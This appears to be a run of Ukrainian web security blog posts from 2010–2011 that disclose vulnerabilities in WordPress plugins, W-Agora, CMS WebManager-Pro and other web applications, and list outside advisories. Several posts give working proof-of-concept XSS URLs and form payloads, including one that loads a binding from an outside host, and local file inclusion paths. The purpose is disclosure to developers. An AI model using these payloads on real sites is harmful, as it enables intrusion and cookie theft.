Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах PhotoSmash Galleries та 1 Flash Gallery. Для котрих з’явилися експлоіти. PhotoSmash Galleries - це плагін для стоворення фото галерей, 1 Flash Gallery - це ще один плагін для стоворення фото галерей.

• XSS in PhotoSmash wordpress plugin (деталі)
• XSS in 1 Flash Gallery wordpress plugin (деталі)
• SQL Injection in 1 Flash Gallery wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

15.01.2011

У жовтні, 27.10.2010, я знайшов Cross-Site Scripting, Local File Inclusion та Brute Force уразливості в W-Agora (це система веб публікації, тобто по суті CMS). Які я виявив на офіційноу сайті w-agora.net. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в W-Agora.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

16.03.2011

XSS:

http://site/current/getfile.php/support_howto/%22%3E%3Cbody%20onload=alert(document.cookie)%3E/1/

Local File Inclusion:

В папці conf:

http://site/current/getfile.php/1

http://site/current/index.php?bn=1

http://site/current/list.php?bn=1

В будь-які папці (тільки на Windows-серверах):

http://site/current/getfile.php/..\1

http://site/current/index.php?bn=..\1

http://site/current/list.php?bn=..\1

Brute Force:

http://site/current/login.php

Уразливі W-Agora 4.2.1 та попередні версії.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WP Forum та Mingle Forum. Для котрих з’явилися експлоіти. WP Forum - це плагін для стоворення форуму, Mingle Forum - це ще один плагін для стоворення форуму.

• SQL Injection in WP Forum wordpress plugin (деталі)
• Path disclosure in Mingle Forum wordpress plugin (деталі)
• XSS in Mingle Forum wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• XSS vulnerability in BlogBird platform (деталі)
• Information disclosure in BloofoxCMS (деталі)
• RSA, The Security Division of EMC, announces a fix for potential security vulnerability in RSAR Federated Identity Manager (деталі)
• Information disclosure in BloofoxCMS (деталі)
• LFI in Novaboard (деталі)
• SAP NetWaver SLD - multiple XSS (деталі)
• SAP Netweaver wsnavigator XSS Security Vulnerability (деталі)
• SAP J2EE Web Services Navigator Cross-Site Scripting (деталі)
• LFI in DZCP (деталі)
• Path disclosure in MyBB (деталі)

Раніше я вже писав про уразливість в Cumulus для Drupal. Така ж уразливість є і в плагіні sfWpCumulusPlugin для symfony, що використовує tagcloud.swf розроблений автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.

Сьогодні я знайшов Cross-Site Scripting уразливість в sfWpCumulusPlugin для symfony. Про що найближчим часом повідомлю розробнику.

XSS:

http://site/sfWpCumulusPlugin/swf/wp-cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.

Уразливі всі версії sfWpCumulusPlugin.

25.10.2010

У березні, 21.03.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на секюріті проекті http://hackzona.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

14.03.2011

Insufficient Anti-automation:

http://hackzona.com.ua/hz.php?name=Feedback
http://hackzona.com.ua/hz.php?name=NLbook

В даних формах немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://hackzona.com.ua/hz.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Дані уразливості вже виправлені.

В даній добірці уразливості в веб додатках:

• Novell Groupwise WebAccess Multiple Cross-Site Scripting Vulnerabilities (деталі)
• Novell Netware Groupwise Internet Gateway Remote Code Execution Vulnerability (деталі)
• SQL injection in Energine (деталі)
• Stored XSS vulnerability in Zomplog (деталі)
• Novell Groupwise Internet Agent Stack Overflow (деталі)
• Novell Groupwise Webaccess Stack Overflow (деталі)
• XSS vulnerability in Zomplog (деталі)
• XSRF (CSRF) in Zomplog (деталі)
• Cisco Security Advisory: CDS Internet Streamer: Web Server Directory Traversal Vulnerability (деталі)
• XSS vulnerability in BlogBird platform (деталі)

11.01.2011

У жовтні, 15.10.2010, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості в CMS WebManager-Pro. Дані уразливості я виявив на різних сайтах на CMS WebManager-Pro від FGS_Studio. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в CMS WebManager-Pro.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.03.2011

Insufficient Anti-automation:

На сторінці контактів (http://site/index.php?menu_id=x) немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці контактів (http://site/index.php?menu_id=x)
<script>alert(document.cookie)</script>В полях: ФИО, E-mail, Телефон, Тема письма, Текст.

Уразливі CMS WebManager-Pro v.7.4.3 (версія від FGS_Studio) та попередні версії.

В даній добірці уразливості в веб додатках:

• pam_captcha username harvest vulnerability (деталі)
• XSS vulnerability in sNews (деталі)
• AlstraSoft E-Friends 4.96 Multiple Remote Vulnerabilities (деталі)
• New znc packages fix denial of service (деталі)
• MyCart 2.0 Multiple Remote Vulnerabilities (деталі)
• XSS vulnerability in Zomplog (деталі)
• Ipswitch Imail Server Queuemgr Format String Remote Code Execution Vulnerability (деталі)
• Ipswitch Imail Server Mailing List Remote Code Execution Vulnerability (деталі)
• Ipswitch Imail Server List Mailer Reply-To Address Remote Code Execution Vulnerability (деталі)
• SQL injection in BloofoxCMS registration plugin (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Question and Answer Forum та WP Forum. Для котрих з’явилися експлоіти. Question and Answer Forum - це плагін для створення форуму питань і відповідей, WP Forum - це плагін для стоворення форуму.

• XSS in Question and Answer Forum wordpress plugin (деталі)
• SQL Injection in WP Forum wordpress plugin (деталі)
• SQL Injection in WP Forum wordpress plugin (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.